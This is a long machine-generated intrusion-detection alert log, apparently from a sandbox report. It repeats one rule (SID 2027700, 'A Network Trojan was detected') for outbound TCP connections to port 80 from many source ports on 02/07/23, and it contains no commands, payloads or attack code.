                            Timestamp:192.168.2.562.204.41.449990802027700 02/07/23-19:58:22.962299
                            SID:2027700
                            Source Port:49990
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450113802027700 02/07/23-19:58:57.370709
                            SID:2027700
                            Source Port:50113
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450465802027700 02/07/23-20:00:33.942201
                            SID:2027700
                            Source Port:50465
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450287802027700 02/07/23-19:59:46.895270
                            SID:2027700
                            Source Port:50287
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449702802027700 02/07/23-19:57:05.106586
                            SID:2027700
                            Source Port:49702
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449730802027700 02/07/23-19:57:13.243832
                            SID:2027700
                            Source Port:49730
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449876802027700 02/07/23-19:57:53.245417
                            SID:2027700
                            Source Port:49876
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450143802027700 02/07/23-19:59:07.357882
                            SID:2027700
                            Source Port:50143
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449818802027700 02/07/23-19:57:36.123767
                            SID:2027700
                            Source Port:49818
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450146802027700 02/07/23-19:59:08.058254
                            SID:2027700
                            Source Port:50146
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450437802027700 02/07/23-20:00:27.438497
                            SID:2027700
                            Source Port:50437
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450434802027700 02/07/23-20:00:26.717538
                            SID:2027700
                            Source Port:50434
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450324802027700 02/07/23-19:59:55.796737
                            SID:2027700
                            Source Port:50324
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449989802027700 02/07/23-19:58:22.562862
                            SID:2027700
                            Source Port:49989
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449871802027700 02/07/23-19:57:52.296229
                            SID:2027700
                            Source Port:49871
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449897802027700 02/07/23-19:57:58.416673
                            SID:2027700
                            Source Port:49897
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449815802027700 02/07/23-19:57:35.404124
                            SID:2027700
                            Source Port:49815
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450426802027700 02/07/23-20:00:24.801297
                            SID:2027700
                            Source Port:50426
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450100802027700 02/07/23-19:58:54.228469
                            SID:2027700
                            Source Port:50100
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449807802027700 02/07/23-19:57:33.429668
                            SID:2027700
                            Source Port:49807
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450098802027700 02/07/23-19:58:53.748513
                            SID:2027700
                            Source Port:50098
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450360802027700 02/07/23-20:00:06.784027
                            SID:2027700
                            Source Port:50360
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450409802027700 02/07/23-20:00:18.614092
                            SID:2027700
                            Source Port:50409
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449848802027700 02/07/23-19:57:43.671762
                            SID:2027700
                            Source Port:49848
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450141802027700 02/07/23-19:59:06.885723
                            SID:2027700
                            Source Port:50141
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449784802027700 02/07/23-19:57:27.871680
                            SID:2027700
                            Source Port:49784
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450182802027700 02/07/23-19:59:16.745810
                            SID:2027700
                            Source Port:50182
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450218802027700 02/07/23-19:59:28.144912
                            SID:2027700
                            Source Port:50218
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450259802027700 02/07/23-19:59:37.982209
                            SID:2027700
                            Source Port:50259
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450389802027700 02/07/23-20:00:13.814637
                            SID:2027700
                            Source Port:50389
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450289802027700 02/07/23-19:59:47.359030
                            SID:2027700
                            Source Port:50289
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450000802027700 02/07/23-19:58:27.513822
                            SID:2027700
                            Source Port:50000
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449889802027700 02/07/23-19:57:56.483664
                            SID:2027700
                            Source Port:49889
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449713802027700 02/07/23-19:57:09.809088
                            SID:2027700
                            Source Port:49713
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450041802027700 02/07/23-19:58:37.467492
                            SID:2027700
                            Source Port:50041
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450118802027700 02/07/23-19:58:58.558092
                            SID:2027700
                            Source Port:50118
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450171802027700 02/07/23-19:59:14.125363
                            SID:2027700
                            Source Port:50171
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450467802027700 02/07/23-20:00:34.410744
                            SID:2027700
                            Source Port:50467
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449843802027700 02/07/23-19:57:41.966115
                            SID:2027700
                            Source Port:49843
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449884802027700 02/07/23-19:57:55.199529
                            SID:2027700
                            Source Port:49884
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450248802027700 02/07/23-19:59:35.309770
                            SID:2027700
                            Source Port:50248
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449881802027700 02/07/23-19:57:54.464877
                            SID:2027700
                            Source Port:49881
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450154802027700 02/07/23-19:59:10.010091
                            SID:2027700
                            Source Port:50154
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450243802027700 02/07/23-19:59:34.125339
                            SID:2027700
                            Source Port:50243
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449970802027700 02/07/23-19:58:17.986268
                            SID:2027700
                            Source Port:49970
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450332802027700 02/07/23-19:59:57.750216
                            SID:2027700
                            Source Port:50332
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449774802027700 02/07/23-19:57:22.791511
                            SID:2027700
                            Source Port:49774
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450047802027700 02/07/23-19:58:38.899810
                            SID:2027700
                            Source Port:50047
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450399802027700 02/07/23-20:00:16.236683
                            SID:2027700
                            Source Port:50399
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449835802027700 02/07/23-19:57:40.026952
                            SID:2027700
                            Source Port:49835
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449924802027700 02/07/23-19:58:07.066105
                            SID:2027700
                            Source Port:49924
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450065802027700 02/07/23-19:58:45.626874
                            SID:2027700
                            Source Port:50065
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450019802027700 02/07/23-19:58:32.292789
                            SID:2027700
                            Source Port:50019
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450365802027700 02/07/23-20:00:08.016119
                            SID:2027700
                            Source Port:50365
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450215802027700 02/07/23-19:59:27.402726
                            SID:2027700
                            Source Port:50215
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449746802027700 02/07/23-19:57:17.135800
                            SID:2027700
                            Source Port:49746
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449942802027700 02/07/23-19:58:11.343155
                            SID:2027700
                            Source Port:49942
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450108802027700 02/07/23-19:58:56.182131
                            SID:2027700
                            Source Port:50108
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450304802027700 02/07/23-19:59:50.968034
                            SID:2027700
                            Source Port:50304
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450187802027700 02/07/23-19:59:17.949465
                            SID:2027700
                            Source Port:50187
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449853802027700 02/07/23-19:57:47.844021
                            SID:2027700
                            Source Port:49853
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450454802027700 02/07/23-20:00:31.504096
                            SID:2027700
                            Source Port:50454
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449764802027700 02/07/23-19:57:20.603429
                            SID:2027700
                            Source Port:49764
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450031802027700 02/07/23-19:58:35.304361
                            SID:2027700
                            Source Port:50031
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450383802027700 02/07/23-20:00:12.387972
                            SID:2027700
                            Source Port:50383
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450120802027700 02/07/23-19:58:59.032260
                            SID:2027700
                            Source Port:50120
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450276802027700 02/07/23-19:59:43.973222
                            SID:2027700
                            Source Port:50276
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450126802027700 02/07/23-19:59:00.503245
                            SID:2027700
                            Source Port:50126
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449952802027700 02/07/23-19:58:13.723295
                            SID:2027700
                            Source Port:49952
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450037802027700 02/07/23-19:58:36.516957
                            SID:2027700
                            Source Port:50037
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449958802027700 02/07/23-19:58:15.137846
                            SID:2027700
                            Source Port:49958
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450003802027700 02/07/23-19:58:28.269253
                            SID:2027700
                            Source Port:50003
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449863802027700 02/07/23-19:57:50.367777
                            SID:2027700
                            Source Port:49863
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450192802027700 02/07/23-19:59:19.202750
                            SID:2027700
                            Source Port:50192
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450393802027700 02/07/23-20:00:14.802337
                            SID:2027700
                            Source Port:50393
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449792802027700 02/07/23-19:57:29.791091
                            SID:2027700
                            Source Port:49792
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449869802027700 02/07/23-19:57:51.811174
                            SID:2027700
                            Source Port:49869
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449999802027700 02/07/23-19:58:27.278096
                            SID:2027700
                            Source Port:49999
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450088802027700 02/07/23-19:58:51.281257
                            SID:2027700
                            Source Port:50088
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450370802027700 02/07/23-20:00:09.189137
                            SID:2027700
                            Source Port:50370
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450281802027700 02/07/23-19:59:45.414960
                            SID:2027700
                            Source Port:50281
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450110802027700 02/07/23-19:58:56.657477
                            SID:2027700
                            Source Port:50110
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450021802027700 02/07/23-19:58:32.794730
                            SID:2027700
                            Source Port:50021
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450177802027700 02/07/23-19:59:15.563617
                            SID:2027700
                            Source Port:50177
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450419802027700 02/07/23-20:00:23.118934
                            SID:2027700
                            Source Port:50419
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450269802027700 02/07/23-19:59:40.413543
                            SID:2027700
                            Source Port:50269
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449993802027700 02/07/23-19:58:24.614337
                            SID:2027700
                            Source Port:49993
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450009802027700 02/07/23-19:58:29.797002
                            SID:2027700
                            Source Port:50009
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449812802027700 02/07/23-19:57:34.636727
                            SID:2027700
                            Source Port:49812
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449879802027700 02/07/23-19:57:53.960321
                            SID:2027700
                            Source Port:49879
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449720802027700 02/07/23-19:57:10.789751
                            SID:2027700
                            Source Port:49720
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449723802027700 02/07/23-19:57:11.507306
                            SID:2027700
                            Source Port:49723
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449968802027700 02/07/23-19:58:17.511977
                            SID:2027700
                            Source Port:49968
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449901802027700 02/07/23-19:57:59.369719
                            SID:2027700
                            Source Port:49901
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450238802027700 02/07/23-19:59:32.939539
                            SID:2027700
                            Source Port:50238
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450149802027700 02/07/23-19:59:08.801458
                            SID:2027700
                            Source Port:50149
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449708802027700 02/07/23-19:57:08.619164
                            SID:2027700
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450250802027700 02/07/23-19:59:35.782201
                            SID:2027700
                            Source Port:50250
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450253802027700 02/07/23-19:59:36.518712
                            SID:2027700
                            Source Port:50253
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450327802027700 02/07/23-19:59:56.530972
                            SID:2027700
                            Source Port:50327
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450416802027700 02/07/23-20:00:22.006473
                            SID:2027700
                            Source Port:50416
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450342802027700 02/07/23-20:00:00.462429
                            SID:2027700
                            Source Port:50342
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450161802027700 02/07/23-19:59:11.700306
                            SID:2027700
                            Source Port:50161
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450431802027700 02/07/23-20:00:25.972242
                            SID:2027700
                            Source Port:50431
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450291802027700 02/07/23-19:59:47.841889
                            SID:2027700
                            Source Port:50291
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450294802027700 02/07/23-19:59:48.563161
                            SID:2027700
                            Source Port:50294
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449891802027700 02/07/23-19:57:56.954067
                            SID:2027700
                            Source Port:49891
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450075802027700 02/07/23-19:58:48.119366
                            SID:2027700
                            Source Port:50075
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450164802027700 02/07/23-19:59:12.434295
                            SID:2027700
                            Source Port:50164
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449914802027700 02/07/23-19:58:02.515565
                            SID:2027700
                            Source Port:49914
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449980802027700 02/07/23-19:58:20.421307
                            SID:2027700
                            Source Port:49980
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449850802027700 02/07/23-19:57:44.320306
                            SID:2027700
                            Source Port:49850
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450225802027700 02/07/23-19:59:29.829004
                            SID:2027700
                            Source Port:50225
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450355802027700 02/07/23-20:00:05.610275
                            SID:2027700
                            Source Port:50355
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449736802027700 02/07/23-19:57:14.683730
                            SID:2027700
                            Source Port:49736
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449866802027700 02/07/23-19:57:51.087084
                            SID:2027700
                            Source Port:49866
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449825802027700 02/07/23-19:57:37.561460
                            SID:2027700
                            Source Port:49825
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449996802027700 02/07/23-19:58:26.579679
                            SID:2027700
                            Source Port:49996
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450006802027700 02/07/23-19:58:29.008274
                            SID:2027700
                            Source Port:50006
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449955802027700 02/07/23-19:58:14.419186
                            SID:2027700
                            Source Port:49955
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450136802027700 02/07/23-19:59:05.899724
                            SID:2027700
                            Source Port:50136
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449777802027700 02/07/23-19:57:23.720957
                            SID:2027700
                            Source Port:49777
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450266802027700 02/07/23-19:59:39.687644
                            SID:2027700
                            Source Port:50266
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450396802027700 02/07/23-20:00:15.510798
                            SID:2027700
                            Source Port:50396
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450314802027700 02/07/23-19:59:53.406803
                            SID:2027700
                            Source Port:50314
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450444802027700 02/07/23-20:00:29.095831
                            SID:2027700
                            Source Port:50444
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450403802027700 02/07/23-20:00:17.175192
                            SID:2027700
                            Source Port:50403
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450059802027700 02/07/23-19:58:41.853764
                            SID:2027700
                            Source Port:50059
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450157802027700 02/07/23-19:59:10.761628
                            SID:2027700
                            Source Port:50157
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450062802027700 02/07/23-19:58:42.938578
                            SID:2027700
                            Source Port:50062
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449829802027700 02/07/23-19:57:38.585640
                            SID:2027700
                            Source Port:49829
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449927802027700 02/07/23-19:58:07.969609
                            SID:2027700
                            Source Port:49927
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449832802027700 02/07/23-19:57:39.308335
                            SID:2027700
                            Source Port:49832
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450160802027700 02/07/23-19:59:11.468507
                            SID:2027700
                            Source Port:50160
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449734802027700 02/07/23-19:57:14.182238
                            SID:2027700
                            Source Port:49734
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450451802027700 02/07/23-20:00:30.804845
                            SID:2027700
                            Source Port:50451
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450001802027700 02/07/23-19:58:27.747122
                            SID:2027700
                            Source Port:50001
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450255802027700 02/07/23-19:59:37.003438
                            SID:2027700
                            Source Port:50255
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450353802027700 02/07/23-20:00:05.126188
                            SID:2027700
                            Source Port:50353
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449930802027700 02/07/23-19:58:08.681863
                            SID:2027700
                            Source Port:49930
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449988802027700 02/07/23-19:58:22.324290
                            SID:2027700
                            Source Port:49988
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449762802027700 02/07/23-19:57:20.088453
                            SID:2027700
                            Source Port:49762
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450090802027700 02/07/23-19:58:51.779336
                            SID:2027700
                            Source Port:50090
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449860802027700 02/07/23-19:57:49.596112
                            SID:2027700
                            Source Port:49860
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450095802027700 02/07/23-19:58:53.020938
                            SID:2027700
                            Source Port:50095
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450448802027700 02/07/23-20:00:30.077914
                            SID:2027700
                            Source Port:50448
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449963802027700 02/07/23-19:58:16.325115
                            SID:2027700
                            Source Port:49963
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450423802027700 02/07/23-20:00:24.067700
                            SID:2027700
                            Source Port:50423
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449804802027700 02/07/23-19:57:32.699147
                            SID:2027700
                            Source Port:49804
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450386802027700 02/07/23-20:00:13.098003
                            SID:2027700
                            Source Port:50386
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450132802027700 02/07/23-19:59:02.326823
                            SID:2027700
                            Source Port:50132
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449770802027700 02/07/23-19:57:21.824482
                            SID:2027700
